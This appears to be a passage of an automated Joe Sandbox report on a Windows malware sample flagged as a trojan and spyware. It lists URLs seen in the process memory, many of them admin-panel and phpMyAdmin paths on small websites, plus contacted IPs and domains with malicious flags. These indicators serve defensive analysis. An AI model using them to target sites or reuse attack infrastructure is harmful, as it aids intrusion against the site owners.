                                                                                                                                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1699278229.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://ericrothphoto.com/phpMyAdmin/8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        http://kompresory-servis.sk/administrator/T8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://feio.jp/PhpMyAdmin/in/8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://kompresory-servis.sk/administrator/Y8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://eshopy-katalog.sk/admin.php8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://eurokamen.sk/predaj_sklad/8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://kompresory-servis.sk/administrator/g8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://aloeveraforever.sk/8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://kompresory-servis.sk/administrator/b8F78.exe, 00000007.00000002.3754866218.000000000422A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://nakacho.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.3.28F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    http://nippondotech.co.jp/8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004211000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://sluchatka.sk/pma/8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://nakacho.com/wp-content/uploads/2017/06/hed_otoiawase.png8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://sluchatka.sk/PhpMyAdmin/8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://khi-ho.ne.jp/phpmyadmin/8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://kompresory-servis.sk/administrator/78F78.exe, 00000007.00000002.3754866218.000000000422A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://straznyanjel.sk/wp-login.php/index.php8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://konic.co.jp/phpmyadmin/8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://eshopy-katalog.sk/administrator/9n/8F78.exe, 00000007.00000002.3754866218.0000000004224000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://merlynsociety.com/administrator/index.phpocalhost8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://www.openssl.org/support/faq.htmlTYPE=2OpenSSL8F78.exe, 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          http://kompresory-servis.sk/administrator/:8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://nakacho.com/wp-content/themes/crieinc1.0/bs/css/bootstrap.min.css8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://outlook.com_explorer.exe, 00000001.00000000.1702956884.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                                                            low
                                                                                                                                                                                                                                            https://nakacho.com/kakusyu_seido_ichiran/kaigai_kensyu/8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://enso-center.org/phpmyadmin/a.justdave.net465I8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            http://kompresory-servis.sk/pma/8F78.exe, 00000007.00000002.3685374127.0000000003DA9000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              http://khi-ho.ne.jp/pma/8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://konic.co.jp/PhpMyAdmin/8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://e-art-studio.co.jp/phpMyAdmin/Z8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://gabio.sk/phpmyadmin/8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://abatek.sk/phpmyadmin/8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                68.233.46.109
                                                                                                                                                                                                                                                brightright.comUnited States
                                                                                                                                                                                                                                                46873HOSTCOLORUStrue
                                                                                                                                                                                                                                                95.216.227.177
                                                                                                                                                                                                                                                unknownGermany
                                                                                                                                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                                                                                                                                37.9.175.8
                                                                                                                                                                                                                                                mail.inhodinky.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                51013WEBSUPPORT-SRO-SK-ASSKfalse
                                                                                                                                                                                                                                                185.65.223.6
                                                                                                                                                                                                                                                inmail.webglobe.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                48689WEBGLOBE-SK-ASSKtrue
                                                                                                                                                                                                                                                211.168.53.110
                                                                                                                                                                                                                                                unknownKorea Republic of
                                                                                                                                                                                                                                                3786LGDACOMLGDACOMCorporationKRtrue
                                                                                                                                                                                                                                                34.94.245.237
                                                                                                                                                                                                                                                sumagulituyo.orgUnited States
                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                187.45.195.138
                                                                                                                                                                                                                                                erikamoveis.com.brBrazil
                                                                                                                                                                                                                                                27715LocawebServicosdeInternetSABRfalse
                                                                                                                                                                                                                                                62.168.119.84
                                                                                                                                                                                                                                                mailhost01.rkd.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                5578AS-BENESTRABratislavaSlovakRepublicSKtrue
                                                                                                                                                                                                                                                46.229.230.4
                                                                                                                                                                                                                                                abatek.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                29405VNET-ASSKtrue
                                                                                                                                                                                                                                                194.55.13.50
                                                                                                                                                                                                                                                unknownGermany
                                                                                                                                                                                                                                                197540NETCUP-ASnetcupGmbHDEfalse
                                                                                                                                                                                                                                                47.254.134.152
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                                                                                                                178.238.40.161
                                                                                                                                                                                                                                                server1.floxm.comCzech Republic
                                                                                                                                                                                                                                                24971MASTER-ASCzechRepublicwwwmasterczCZfalse
                                                                                                                                                                                                                                                93.185.102.224
                                                                                                                                                                                                                                                roland-sk.skCzech Republic
                                                                                                                                                                                                                                                43541VSHOSTINGCZfalse
                                                                                                                                                                                                                                                92.240.253.14
                                                                                                                                                                                                                                                instalanova.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                42005LIGHTSTORM-COMMUNICATIONS-SRO-SK-ASPeeringsSKfalse
                                                                                                                                                                                                                                                104.21.2.203
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                91.215.85.17
                                                                                                                                                                                                                                                stualialuyastrelia.netRussian Federation
                                                                                                                                                                                                                                                34665PINDC-ASRUtrue
                                                                                                                                                                                                                                                94.23.121.150
                                                                                                                                                                                                                                                unknownFrance
                                                                                                                                                                                                                                                16276OVHFRfalse
                                                                                                                                                                                                                                                34.205.242.146
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                87.118.96.154
                                                                                                                                                                                                                                                unknownGermany
                                                                                                                                                                                                                                                31103KEYWEB-ASDEfalse
                                                                                                                                                                                                                                                216.230.254.4
                                                                                                                                                                                                                                                ampub04.alpha-mail.netUnited States
                                                                                                                                                                                                                                                23394PSPINC-BDCUStrue
                                                                                                                                                                                                                                                46.229.230.81
                                                                                                                                                                                                                                                rotas.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                29405VNET-ASSKtrue
                                                                                                                                                                                                                                                104.21.18.224
                                                                                                                                                                                                                                                diagramfiremonkeyowwa.funUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                104.26.6.37
                                                                                                                                                                                                                                                www.hugedomains.comUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                89.46.109.48
                                                                                                                                                                                                                                                predan.itItaly
                                                                                                                                                                                                                                                31034ARUBA-ASNITtrue
                                                                                                                                                                                                                                                157.205.8.22
                                                                                                                                                                                                                                                mxi.alpha-prm.jpJapan17514AICSOtsukaCorpJPfalse
                                                                                                                                                                                                                                                77.93.220.102
                                                                                                                                                                                                                                                gw1.mx.anafra.netCzech Republic
                                                                                                                                                                                                                                                24971MASTER-ASCzechRepublicwwwmasterczCZtrue
                                                                                                                                                                                                                                                46.229.230.107
                                                                                                                                                                                                                                                reproma.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                29405VNET-ASSKfalse
                                                                                                                                                                                                                                                185.196.8.22
                                                                                                                                                                                                                                                bparowe.comSwitzerland
                                                                                                                                                                                                                                                34888SIMPLECARRER2ITfalse
                                                                                                                                                                                                                                                46.229.230.106
                                                                                                                                                                                                                                                useron22.hostmaster.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                29405VNET-ASSKfalse
                                                                                                                                                                                                                                                50.116.86.49
                                                                                                                                                                                                                                                escolapatelli.com.brUnited States
                                                                                                                                                                                                                                                46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                                                                                                103.19.26.39
                                                                                                                                                                                                                                                fosse.virtualhosting.hkHong Kong
                                                                                                                                                                                                                                                23881UDOMAIN-AS-APUDomainWebHostingCompanyLtdHKtrue
                                                                                                                                                                                                                                                81.0.206.104
                                                                                                                                                                                                                                                izberatel.skCzech Republic
                                                                                                                                                                                                                                                15685CASABLANCA-ASInternetCollocationProviderCZfalse
                                                                                                                                                                                                                                                193.163.77.6
                                                                                                                                                                                                                                                janckulik.skDenmark
                                                                                                                                                                                                                                                1935FR-RENATER-LIMOUSINReseauRegionalLimousinEUfalse
                                                                                                                                                                                                                                                15.197.142.173
                                                                                                                                                                                                                                                enso-center.orgUnited States
                                                                                                                                                                                                                                                7430TANDEMUStrue
                                                                                                                                                                                                                                                185.22.174.119
                                                                                                                                                                                                                                                unknownRussian Federation
                                                                                                                                                                                                                                                43317FISHNET-ASRUfalse
                                                                                                                                                                                                                                                216.230.253.85
                                                                                                                                                                                                                                                ftp.e-art-studio.co.jpUnited States
                                                                                                                                                                                                                                                23394PSPINC-BDCUStrue
                                                                                                                                                                                                                                                86.107.32.130
                                                                                                                                                                                                                                                www.elteconline.comRomania
                                                                                                                                                                                                                                                6910DIALTELECOMROtrue
                                                                                                                                                                                                                                                104.21.46.59
                                                                                                                                                                                                                                                cream.hitsturbo.comUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                46.229.230.21
                                                                                                                                                                                                                                                mx3.webhouse.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                29405VNET-ASSKfalse
                                                                                                                                                                                                                                                38.47.221.193
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                174COGENT-174USfalse
                                                                                                                                                                                                                                                62.109.151.15
                                                                                                                                                                                                                                                e-bicycles.euCzech Republic
                                                                                                                                                                                                                                                29134IGNUM-ASCzechRepublicCZtrue
                                                                                                                                                                                                                                                186.202.4.42
                                                                                                                                                                                                                                                mx.a.locaweb.com.brBrazil
                                                                                                                                                                                                                                                27715LocawebServicosdeInternetSABRtrue
                                                                                                                                                                                                                                                141.98.102.194
                                                                                                                                                                                                                                                ftp.eshopy-katalog.skRomania
                                                                                                                                                                                                                                                9009M247GBtrue
                                                                                                                                                                                                                                                62.149.128.72
                                                                                                                                                                                                                                                mx.elteconline.comItaly
                                                                                                                                                                                                                                                31034ARUBA-ASNITtrue
                                                                                                                                                                                                                                                62.149.128.74
                                                                                                                                                                                                                                                mail.emmetisportfun.itItaly
                                                                                                                                                                                                                                                31034ARUBA-ASNITfalse
                                                                                                                                                                                                                                                104.198.2.251
                                                                                                                                                                                                                                                snukerukeutit.orgUnited States
                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                217.26.54.21
                                                                                                                                                                                                                                                elrocket.comSwitzerland
                                                                                                                                                                                                                                                29097HOSTPOINT-ASCHtrue
                                                                                                                                                                                                                                                64.190.63.111
                                                                                                                                                                                                                                                tsutomu.comUnited States
                                                                                                                                                                                                                                                11696NBS11696UStrue
                                                                                                                                                                                                                                                103.168.172.219
                                                                                                                                                                                                                                                in1-smtp.messagingengine.comunknown
                                                                                                                                                                                                                                                7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                                                                                                                103.168.172.218
                                                                                                                                                                                                                                                unknownunknown
                                                                                                                                                                                                                                                7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                                                                                                                103.168.172.217
                                                                                                                                                                                                                                                unknownunknown
                                                                                                                                                                                                                                                7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                                                                                                                                                                                                                                85.248.130.200
                                                                                                                                                                                                                                                www.sluchatka.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                5578AS-BENESTRABratislavaSlovakRepublicSKfalse
                                                                                                                                                                                                                                                62.149.128.157
                                                                                                                                                                                                                                                mx.emmetisportfun.itItaly
                                                                                                                                                                                                                                                31034ARUBA-ASNITfalse
                                                                                                                                                                                                                                                103.168.172.216
                                                                                                                                                                                                                                                unknownunknown
                                                                                                                                                                                                                                                7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                                                                                                                                                                                                                                89.161.228.119
                                                                                                                                                                                                                                                preda.plPoland
                                                                                                                                                                                                                                                12824HOMEPL-ASPLtrue
                                                                                                                                                                                                                                                62.149.128.151
                                                                                                                                                                                                                                                unknownItaly
                                                                                                                                                                                                                                                31034ARUBA-ASNITfalse
                                                                                                                                                                                                                                                62.149.128.154
                                                                                                                                                                                                                                                unknownItaly
                                                                                                                                                                                                                                                31034ARUBA-ASNITfalse
                                                                                                                                                                                                                                                185.32.160.10
                                                                                                                                                                                                                                                detmar.skCzech Republic
                                                                                                                                                                                                                                                24971MASTER-ASCzechRepublicwwwmasterczCZtrue
                                                                                                                                                                                                                                                103.168.172.221
                                                                                                                                                                                                                                                unknownunknown
                                                                                                                                                                                                                                                7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                                                                                                                103.168.172.220
                                                                                                                                                                                                                                                unknownunknown
                                                                                                                                                                                                                                                7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                                                                                                                35.190.10.69
                                                                                                                                                                                                                                                mail.ericrothphoto.comUnited States
                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                34.143.166.163
                                                                                                                                                                                                                                                lightseinsteniki.orgUnited States
                                                                                                                                                                                                                                                2686ATGS-MMD-ASUStrue
                                                                                                                                                                                                                                                46.229.230.40
                                                                                                                                                                                                                                                useron17.hostmaster.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                29405VNET-ASSKfalse
                                                                                                                                                                                                                                                62.109.128.119
                                                                                                                                                                                                                                                ax-sk1-mx4.ignum.euCzech Republic
                                                                                                                                                                                                                                                29134IGNUM-ASCzechRepublicCZtrue
                                                                                                                                                                                                                                                148.251.46.115
                                                                                                                                                                                                                                                unknownGermany
                                                                                                                                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                                                                                                                                172.67.152.228
                                                                                                                                                                                                                                                keramat.skUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                164.46.93.189
                                                                                                                                                                                                                                                mail.st-comet.comJapan4694IDCFIDCFrontierIncJPtrue
                                                                                                                                                                                                                                                217.61.3.26
                                                                                                                                                                                                                                                mx2.hostcreators.skItaly
                                                                                                                                                                                                                                                200185XANDMAIL-ASNDEtrue
                                                                                                                                                                                                                                                3.33.152.147
                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                8987AMAZONEXPANSIONGBtrue
                                                                                                                                                                                                                                                92.240.253.136
                                                                                                                                                                                                                                                relay.exohosting.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                42005LIGHTSTORM-COMMUNICATIONS-SRO-SK-ASPeeringsSKtrue
                                                                                                                                                                                                                                                104.21.13.14
                                                                                                                                                                                                                                                bombertublestylebanws.funUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                172.67.143.130
                                                                                                                                                                                                                                                neighborhoodfeelsa.funUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                93.184.77.232
                                                                                                                                                                                                                                                mx1.webhouse.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                29405VNET-ASSKfalse
                                                                                                                                                                                                                                                162.43.104.145
                                                                                                                                                                                                                                                pop3.nakacho.comUnited States
                                                                                                                                                                                                                                                11333CYBERTRAILSUStrue
                                                                                                                                                                                                                                                178.238.43.196
                                                                                                                                                                                                                                                mail.cesys.euCzech Republic
                                                                                                                                                                                                                                                24971MASTER-ASCzechRepublicwwwmasterczCZfalse
                                                                                                                                                                                                                                                85.248.129.35
                                                                                                                                                                                                                                                inhodinky.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                5578AS-BENESTRABratislavaSlovakRepublicSKtrue
                                                                                                                                                                                                                                                37.9.169.113
                                                                                                                                                                                                                                                mailin1.inhodinky.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                51013WEBSUPPORT-SRO-SK-ASSKfalse
                                                                                                                                                                                                                                                37.9.169.112
                                                                                                                                                                                                                                                mailin2.inhodinky.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                51013WEBSUPPORT-SRO-SK-ASSKtrue
                                                                                                                                                                                                                                                85.248.129.36
                                                                                                                                                                                                                                                mailgate.inhodinky.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                5578AS-BENESTRABratislavaSlovakRepublicSKfalse
                                                                                                                                                                                                                                                104.21.45.142
                                                                                                                                                                                                                                                shpilliwilli.comUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                37.9.175.188
                                                                                                                                                                                                                                                aloeveraforever.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                51013WEBSUPPORT-SRO-SK-ASSKfalse
                                                                                                                                                                                                                                                54.161.222.85
                                                                                                                                                                                                                                                hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                                14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                164.46.121.63
                                                                                                                                                                                                                                                s-kotobuki-s.co.jpJapan4694IDCFIDCFrontierIncJPtrue
                                                                                                                                                                                                                                                104.21.88.149
                                                                                                                                                                                                                                                linkofstrumble.comUnited States
                                                                                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                92.240.253.3
                                                                                                                                                                                                                                                eurokamen.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                42005LIGHTSTORM-COMMUNICATIONS-SRO-SK-ASPeeringsSKtrue
                                                                                                                                                                                                                                                104.47.17.74
                                                                                                                                                                                                                                                rotas-sk.mail.protection.outlook.comUnited States
                                                                                                                                                                                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                83.167.249.7
                                                                                                                                                                                                                                                predajpaliet.skCzech Republic
                                                                                                                                                                                                                                                24971MASTER-ASCzechRepublicwwwmasterczCZtrue
                                                                                                                                                                                                                                                59.106.13.82
                                                                                                                                                                                                                                                oitacity.jpJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                45.13.137.8
                                                                                                                                                                                                                                                mailin1.aloeveraforever.skRomania
                                                                                                                                                                                                                                                43431IX-ASROtrue
                                                                                                                                                                                                                                                66.97.32.25
                                                                                                                                                                                                                                                emr.com.arUnited States
                                                                                                                                                                                                                                                27823DattateccomARtrue
                                                                                                                                                                                                                                                37.9.175.180
                                                                                                                                                                                                                                                kanapy.skSlovakia (SLOVAK Republic)
                                                                                                                                                                                                                                                51013WEBSUPPORT-SRO-SK-ASSKfalse
                                                                                                                                                                                                                                                54.209.32.212
                                                                                                                                                                                                                                                hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                                14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                23.239.22.202
                                                                                                                                                                                                                                                aexoden.comUnited States
                                                                                                                                                                                                                                                63949LINODE-APLinodeLLCUSfalse
                                                                                                                                                                                                                                                217.26.49.139
                                                                                                                                                                                                                                                mx2.mail.hostpoint.chSwitzerland
                                                                                                                                                                                                                                                29097HOSTPOINT-ASCHtrue
                                                                                                                                                                                                                                                89.46.109.20
                                                                                                                                                                                                                                                emmetisportfun.itItaly
                                                                                                                                                                                                                                                31034ARUBA-ASNITtrue
                                                                                                                                                                                                                                                45.13.137.7
                                                                                                                                                                                                                                                mailin1.kanapy.skRomania
                                                                                                                                                                                                                                                43431IX-ASROtrue
                                                                                                                                                                                                                                                2.180.10.7
                                                                                                                                                                                                                                                ftpvoyager.ccIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                                58224TCIIRtrue
                                                                                                                                                                                                                                                23.236.62.147
                                                                                                                                                                                                                                                kingsway-hk.comUnited States
                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                62.149.128.163
                                                                                                                                                                                                                                                unknownItaly
                                                                                                                                                                                                                                                31034ARUBA-ASNITfalse
                                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                                127.0.0.1
                                                                                                                                                                                                                                                Joe Sandbox version:38.0.0 Ammolite
                                                                                                                                                                                                                                                Analysis ID:1365407
                                                                                                                                                                                                                                                Start date and time:2023-12-21 05:01:08 +01:00
                                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                Overall analysis duration:0h 14m 22s
                                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                Number of analysed new started processes analysed:43
                                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                                Number of injected processes analysed:2
                                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                                Sample name:ZRgv8wdMtR.exe
                                                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                                                Original Sample Name:82fca540e2348eaf0f7c70992ac6c98a.exe
                                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                                Classification:mal100.spre.troj.spyw.expl.evad.winEXE@66/1087@297/100
                                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                                • Successful, ratio: 90%
                                                                                                                                                                                                                                                HCA Information:Failed
                                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
